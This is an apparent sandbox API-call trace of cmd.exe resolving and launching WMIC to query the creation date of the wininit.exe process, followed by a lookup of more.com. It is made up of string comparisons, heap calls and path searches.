[0561.695] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18
[0561.695] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4
[0561.695] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18
[0561.695] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3
[0561.696] _wcsicmp (_String1="WMIC", _String2="START") returned 4
[0561.696] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19
[0561.696] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12
[0561.696] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10
[0561.696] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7
[0561.696] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7
[0561.696] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22
[0561.696] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17
[0561.696] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21
[0561.696] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20
[0561.696] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10
[0561.696] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19
[0561.696] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18
[0561.696] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19
[0561.696] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3
[0561.696] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20
[0561.696] _wcsicmp (_String1="WMIC", _String2="CD") returned 20
[0561.696] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20
[0561.696] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5
[0561.696] _wcsicmp (_String1="WMIC", _String2="REN") returned 5
[0561.696] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18
[0561.696] _wcsicmp (_String1="WMIC", _String2="SET") returned 4
[0561.697] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7
[0561.697] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19
[0561.697] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3
[0561.697] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7
[0561.697] _wcsicmp (_String1="WMIC", _String2="MD") returned 10
[0561.697] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10
[0561.697] _wcsicmp (_String1="WMIC", _String2="RD") returned 5
[0561.697] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5
[0561.697] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7
[0561.697] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16
[0561.697] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4
[0561.697] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20
[0561.697] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20
[0561.697] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1
[0561.697] _wcsicmp (_String1="WMIC", _String2="VER") returned 1
[0561.697] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1
[0561.697] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18
[0561.697] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4
[0561.697] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18
[0561.697] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3
[0561.697] _wcsicmp (_String1="WMIC", _String2="START") returned 4
[0561.697] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19
[0561.697] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12
[0561.698] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10
[0561.698] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7
[0561.698] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7
[0561.698] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22
[0561.698] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17
[0561.698] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21
[0561.698] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20
[0561.698] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10
[0561.698] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17
[0561.698] _wcsicmp (_String1="WMIC", _String2="IF") returned 14
[0561.698] _wcsicmp (_String1="WMIC", _String2="REM") returned 5
[0561.698] GetProcessHeap () returned 0x420000
[0561.698] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x4010) returned 0x43b010
[0561.698] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19
[0561.698] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18
[0561.698] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19
[0561.698] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3
[0561.699] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20
[0561.699] _wcsicmp (_String1="WMIC", _String2="CD") returned 20
[0561.699] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20
[0561.699] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5
[0561.699] _wcsicmp (_String1="WMIC", _String2="REN") returned 5
[0561.699] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18
[0561.699] _wcsicmp (_String1="WMIC", _String2="SET") returned 4
[0561.699] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7
[0561.699] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19
[0561.699] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3
[0561.699] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7
[0561.699] _wcsicmp (_String1="WMIC", _String2="MD") returned 10
[0561.699] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10
[0561.699] _wcsicmp (_String1="WMIC", _String2="RD") returned 5
[0561.699] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5
[0561.699] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7
[0561.699] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16
[0561.699] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4
[0561.699] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20
[0561.699] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20
[0561.699] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1
[0561.699] _wcsicmp (_String1="WMIC", _String2="VER") returned 1
[0561.699] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1
[0561.699] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18
[0561.700] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4
[0561.700] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18
[0561.700] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3
[0561.700] _wcsicmp (_String1="WMIC", _String2="START") returned 4
[0561.700] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19
[0561.700] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12
[0561.700] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10
[0561.700] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7
[0561.700] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7
[0561.700] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22
[0561.700] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17
[0561.700] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21
[0561.700] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20
[0561.700] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10
[0561.700] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20
[0561.701] GetProcessHeap () returned 0x420000
[0561.701] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x420) returned 0x43f030
[0561.701] SetErrorMode (uMode=0x0) returned 0x0
[0561.701] SetErrorMode (uMode=0x1) returned 0x0
[0561.701] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x43f040, lpFilePart=0x2ef490 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2ef490*="system32") returned 0x13
[0561.701] SetErrorMode (uMode=0x0) returned 0x1
[0561.701] GetProcessHeap () returned 0x420000
[0561.701] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x43f030, Size=0x42) returned 0x43f030
[0561.701] GetProcessHeap () returned 0x420000
[0561.701] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x43f030) returned 0x42
[0561.702] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0561.702] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0561.702] GetProcessHeap () returned 0x420000
[0561.702] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1ce) returned 0x43a210
[0561.702] GetProcessHeap () returned 0x420000
[0561.702] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x38c) returned 0x43f090
[0561.711] GetProcessHeap () returned 0x420000
[0561.711] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x43f090, Size=0x1d0) returned 0x43f090
[0561.711] GetProcessHeap () returned 0x420000
[0561.711] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x43f090) returned 0x1d0
[0561.711] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0561.711] GetProcessHeap () returned 0x420000
[0561.711] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xe8) returned 0x43f270
[0561.711] GetProcessHeap () returned 0x420000
[0561.711] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x43f270, Size=0x7e) returned 0x43f270
[0561.711] GetProcessHeap () returned 0x420000
[0561.711] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x43f270) returned 0x7e
[0561.713] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.713] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.713] GetLastError () returned 0x2
[0561.713] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.714] GetLastError () returned 0x2
[0561.714] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.714] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.717] GetLastError () returned 0x2
[0561.717] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.717] GetLastError () returned 0x2
[0561.717] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.717] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.718] GetLastError () returned 0x2
[0561.718] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.718] GetLastError () returned 0x2
[0561.718] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.718] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*" (normalized: "c:\\windows\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.718] GetLastError () returned 0x2
[0561.718] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC" (normalized: "c:\\windows\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.719] GetLastError () returned 0x2
[0561.719] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.719] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*" (normalized: "c:\\windows\\system32\\wbem\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0x43a3f0
[0561.719] GetProcessHeap () returned 0x420000
[0561.719] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x28) returned 0x4347e0
[0561.719] FindClose (in: hFindFile=0x43a3f0 | out: hFindFile=0x43a3f0) returned 1
[0561.719] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM" (normalized: "c:\\windows\\system32\\wbem\\wmic.com"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.720] GetLastError () returned 0x2
[0561.720] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0x43a3f0
[0561.720] GetProcessHeap () returned 0x420000
[0561.720] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x4347e0, Size=0x8) returned 0x43a450
[0561.720] FindClose (in: hFindFile=0x43a3f0 | out: hFindFile=0x43a3f0) returned 1
[0561.720] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0561.720] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0561.720] GetProcessHeap () returned 0x420000
[0561.720] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x28) returned 0x4347e0
[0561.720] GetProcessHeap () returned 0x420000
[0561.720] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x218) returned 0x43f300
[0561.720] GetProcessHeap () returned 0x420000
[0561.720] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x82) returned 0x43f520
[0561.720] SetErrorMode (uMode=0x0) returned 0x0
[0561.721] SetErrorMode (uMode=0x1) returned 0x0
[0561.721] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x43f5c0, lpFilePart=0x2ef220 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2ef220*="system32") returned 0x13
[0561.721] SetErrorMode (uMode=0x0) returned 0x1
[0561.721] GetProcessHeap () returned 0x420000
[0561.721] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x43f5b0, Size=0x42) returned 0x43f5b0
[0561.721] GetProcessHeap () returned 0x420000
[0561.721] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x43f5b0) returned 0x42
[0561.721] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0561.721] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0561.721] GetProcessHeap () returned 0x420000
[0561.721] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1ce) returned 0x43f610
[0561.721] GetProcessHeap () returned 0x420000
[0561.721] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x38c) returned 0x43f7f0
[0561.721] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x43f7f0, Size=0x1d0) returned 0x43f7f0
[0561.721] GetProcessHeap () returned 0x420000
[0561.721] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x43f7f0) returned 0x1d0
[0561.722] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0561.722] GetProcessHeap () returned 0x420000
[0561.722] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xe8) returned 0x43f9d0
[0561.722] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x43f9d0, Size=0x7e) returned 0x43f9d0
[0561.722] GetProcessHeap () returned 0x420000
[0561.722] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x43f9d0) returned 0x7e
[0561.722] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.722] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.722] GetLastError () returned 0x2
[0561.722] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.722] GetLastError () returned 0x2
[0561.723] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.723] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.723] GetLastError () returned 0x2
[0561.723] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.723] GetLastError () returned 0x2
[0561.723] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.723] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.724] GetLastError () returned 0x2
[0561.724] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.724] GetLastError () returned 0x2
[0561.724] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.724] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*" (normalized: "c:\\windows\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.724] GetLastError () returned 0x2
[0561.724] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC" (normalized: "c:\\windows\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.724] GetLastError () returned 0x2
[0561.725] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.725] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*" (normalized: "c:\\windows\\system32\\wbem\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0x43a3f0
[0561.725] FindClose (in: hFindFile=0x43a3f0 | out: hFindFile=0x43a3f0) returned 1
[0561.725] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM" (normalized: "c:\\windows\\system32\\wbem\\wmic.com"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.725] GetLastError () returned 0x2
[0561.725] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0x43a3f0
[0561.725] FindClose (in: hFindFile=0x43a3f0 | out: hFindFile=0x43a3f0) returned 1
[0561.726] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0561.726] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0561.726] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0561.726] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef298, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef258 | out: lpAttributeList=0x2ef298, lpSize=0x2ef258) returned 1
[0561.726] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef298, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef248, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef298, lpPreviousValue=0x0) returned 1
[0561.726] GetStartupInfoW (in: lpStartupInfo=0x2ef3b0 | out: lpStartupInfo=0x2ef3b0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0561.726] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1
[0561.729] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC PROCESS where name=\"wininit.exe\" get creationdate ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x2ef2d0*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="WMIC PROCESS where name=\"wininit.exe\" get creationdate ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef280 | out: lpCommandLine="WMIC PROCESS where name=\"wininit.exe\" get creationdate ", lpProcessInformation=0x2ef280*(hProcess=0x64, hThread=0x5c, dwProcessId=0x520, dwThreadId=0x440)) returned 1
[0561.748] CloseHandle (hObject=0x5c) returned 1
[0561.748] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0561.748] GetProcessHeap () returned 0x420000
[0561.748] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x438fb0 | out: hHeap=0x420000) returned 1
[0561.748] GetEnvironmentStringsW () returned 0x438fb0*
[0561.748] GetProcessHeap () returned 0x420000
[0561.748] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb78) returned 0x43fe40
[0561.748] memcpy (in: _Dst=0x43fe40, _Src=0x438fb0, _Size=0xb78 | out: _Dst=0x43fe40) returned 0x43fe40
[0561.748] FreeEnvironmentStringsW (penv=0x438fb0) returned 1
[0561.748] GetProcessHeap () returned 0x420000
[0561.748] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x43a470 | out: hHeap=0x420000) returned 1
[0561.748] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef298 | out: lpAttributeList=0x2ef298)
[0561.748] _get_osfhandle (_FileHandle=3) returned 0x58
[0561.748] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x58, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1
[0561.748] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0
[0561.749] _close (_FileHandle=5) returned 0
[0561.750] _dup (_FileHandle=0) returned 4
[0561.750] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0
[0561.751] _close (_FileHandle=3) returned 0
[0561.752] SetErrorMode (uMode=0x0) returned 0x0
[0561.752] SetErrorMode (uMode=0x1) returned 0x0
[0561.752] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x438fc0, lpFilePart=0x2ef490 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2ef490*="system32") returned 0x13
[0561.752] SetErrorMode (uMode=0x0) returned 0x1
[0561.752] GetProcessHeap () returned 0x420000
[0561.752] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x438fb0, Size=0x42) returned 0x438fb0
[0561.752] GetProcessHeap () returned 0x420000
[0561.752] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x438fb0) returned 0x42
[0561.752] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0561.752] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0561.752] GetProcessHeap () returned 0x420000
[0561.753] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1ce) returned 0x435ea0
[0561.753] GetProcessHeap () returned 0x420000
[0561.753] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x38c) returned 0x439010
[0561.753] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x439010, Size=0x1d0) returned 0x439010
[0561.753] GetProcessHeap () returned 0x420000
[0561.753] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x439010) returned 0x1d0
[0561.753] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0561.753] GetProcessHeap () returned 0x420000
[0561.753] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xe8) returned 0x4391f0
[0561.753] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x4391f0, Size=0x7e) returned 0x4391f0
[0561.753] GetProcessHeap () returned 0x420000
[0561.753] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4391f0) returned 0x7e
[0561.753] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.*" (normalized: "c:\\windows\\system32\\more.*"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0x436080
[0561.753] FindClose (in: hFindFile=0x436080 | out: hFindFile=0x436080) returned 1
[0561.754] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.COM" (normalized: "c:\\windows\\system32\\more.com"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0x436080
[0561.754] FindClose (in: hFindFile=0x436080 | out: hFindFile=0x436080) returned 1
[0561.754] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1
